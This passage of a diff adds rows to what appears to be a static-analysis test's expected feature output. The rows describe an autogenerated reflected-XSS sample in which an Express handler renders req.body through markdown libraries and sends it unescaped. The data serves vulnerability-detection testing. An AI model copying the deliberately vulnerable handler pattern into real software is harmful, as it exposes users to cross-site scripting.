snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:59:8 | unified()\\n .use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:59:8 | unified()\\n .use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:59:8 | unified()\\n .use | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:59:8 | unified()\\n .use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:59:8 | unified()\\n .use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:59:18 | exceptional return of unified ... rkdown) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:59:18 | exceptional return of unified ... rkdown) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:59:18 | exceptional return of unified ... rkdown) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:59:18 | exceptional return of unified ... rkdown) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:59:18 | exceptional return of unified ... rkdown) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:59:18 | unified ... rkdown) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:59:18 | unified ... rkdown) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:59:18 | unified ... rkdown) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:59:18 | unified ... rkdown) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:59:18 | unified ... rkdown) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:60:8 | unified ... .use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:60:8 | unified ... .use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:60:8 | unified ... .use | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:60:8 | unified ... .use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:60:8 | unified ... .use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:60:23 | exceptional return of unified ... rehype) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:60:23 | exceptional return of unified ... rehype) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:60:23 | exceptional return of unified ... rehype) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:60:23 | exceptional return of unified ... rehype) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:60:23 | exceptional return of unified ... rehype) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:60:23 | unified ... rehype) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:60:23 | unified ... rehype) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:60:23 | unified ... rehype) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:60:23 | unified ... rehype) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:60:23 | unified ... rehype) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:61:8 | unified ... .use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:61:8 | unified ... .use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:61:8 | unified ... .use | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:61:8 | unified ... .use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:61:8 | unified ... .use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:61:32 | exceptional return of unified ... \\udc4b\\u1f30d\\udf0d' }) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:61:32 | exceptional return of unified ... \\udc4b\\u1f30d\\udf0d' }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:61:32 | exceptional return of unified ... \\udc4b\\u1f30d\\udf0d' }) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:61:32 | exceptional return of unified ... \\udc4b\\u1f30d\\udf0d' }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:61:32 | exceptional return of unified ... \\udc4b\\u1f30d\\udf0d' }) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:61:32 | unified ... \\udc4b\\u1f30d\\udf0d' }) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:61:32 | unified ... \\udc4b\\u1f30d\\udf0d' }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:61:32 | unified ... \\udc4b\\u1f30d\\udf0d' }) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:61:32 | unified ... \\udc4b\\u1f30d\\udf0d' }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:61:32 | unified ... \\udc4b\\u1f30d\\udf0d' }) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:62:8 | unified ... .use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:62:8 | unified ... .use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:62:8 | unified ... .use | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:62:8 | unified ... .use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:62:8 | unified ... .use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:62:16 | exceptional return of unified ... format) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:62:16 | exceptional return of unified ... format) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:62:16 | exceptional return of unified ... format) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:62:16 | exceptional return of unified ... format) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:62:16 | exceptional return of unified ... format) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:62:16 | unified ... format) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:62:16 | unified ... format) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:62:16 | unified ... format) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:62:16 | unified ... format) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:62:16 | unified ... format) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:63:8 | unified ... .use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:63:8 | unified ... .use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:63:8 | unified ... .use | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:63:8 | unified ... .use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:63:8 | unified ... .use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:63:14 | exceptional return of unified ... e(html) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:63:14 | exceptional return of unified ... e(html) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:63:14 | exceptional return of unified ... e(html) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:63:14 | exceptional return of unified ... e(html) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:63:14 | exceptional return of unified ... e(html) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:63:14 | unified ... e(html) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:63:14 | unified ... e(html) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:63:14 | unified ... e(html) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:63:14 | unified ... e(html) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:63:14 | unified ... e(html) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:64:12 | unified ... process | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:64:12 | unified ... process | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:64:12 | unified ... process | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:64:12 | unified ... process | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:64:12 | unified ... process | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:66:6 | exceptional return of unified ... \\n }) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:66:6 | exceptional return of unified ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:66:6 | exceptional return of unified ... \\n }) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:66:6 | exceptional return of unified ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:66:6 | exceptional return of unified ... \\n }) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:66:6 | unified ... \\n }) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:66:6 | unified ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:66:6 | unified ... \\n }) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:66:6 | unified ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:58:3:66:6 | unified ... \\n }) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:59:6:59:8 | use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:59:6:59:8 | use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:59:6:59:8 | use | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:59:6:59:8 | use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:59:6:59:8 | use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:59:10:59:17 | markdown | CalleeFlexibleAccessPath | unified().use | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:59:10:59:17 | markdown | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:59:10:59:17 | markdown | calleeImports | unified | @@ -19830,6 +133389,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:59:10:59:17 | markdown | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:59:10:59:17 | markdown | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:59:10:59:17 | markdown | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:60:6:60:8 | use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:60:6:60:8 | use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:60:6:60:8 | use | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:60:6:60:8 | use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:60:6:60:8 | use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:60:10:60:22 | remark2rehype | CalleeFlexibleAccessPath | unified().use().use | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:60:10:60:22 | remark2rehype | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:60:10:60:22 | remark2rehype | calleeImports | unified | @@ -19838,6 +133402,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:60:10:60:22 | remark2rehype | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:60:10:60:22 | remark2rehype | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:60:10:60:22 | remark2rehype | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:6:61:8 | use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:6:61:8 | use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:6:61:8 | use | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:6:61:8 | use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:6:61:8 | use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:10:61:12 | doc | CalleeFlexibleAccessPath | unified().use().use().use | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:10:61:12 | doc | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:10:61:12 | doc | calleeImports | unified | @@ -19854,6 +133423,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:15:61:31 | { title: '\\u1f44b\\udc4b\\u1f30d\\udf0d' } | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:15:61:31 | { title: '\\u1f44b\\udc4b\\u1f30d\\udf0d' } | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:15:61:31 | { title: '\\u1f44b\\udc4b\\u1f30d\\udf0d' } | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:17:61:21 | title | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:17:61:21 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:17:61:21 | title | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:17:61:21 | title | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:17:61:21 | title | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:17:61:29 | title: '\\u1f44b\\udc4b\\u1f30d\\udf0d' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:17:61:29 | title: '\\u1f44b\\udc4b\\u1f30d\\udf0d' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:17:61:29 | title: '\\u1f44b\\udc4b\\u1f30d\\udf0d' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:17:61:29 | title: '\\u1f44b\\udc4b\\u1f30d\\udf0d' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:17:61:29 | title: '\\u1f44b\\udc4b\\u1f30d\\udf0d' | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:17:61:29 | title: '\\u1f44b\\udc4b\\u1f30d\\udf0d' | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:17:61:29 | title: '\\u1f44b\\udc4b\\u1f30d\\udf0d' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:17:61:29 | title: '\\u1f44b\\udc4b\\u1f30d\\udf0d' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:17:61:29 | title: '\\u1f44b\\udc4b\\u1f30d\\udf0d' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:17:61:29 | title: '\\u1f44b\\udc4b\\u1f30d\\udf0d' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:61:24:61:29 | 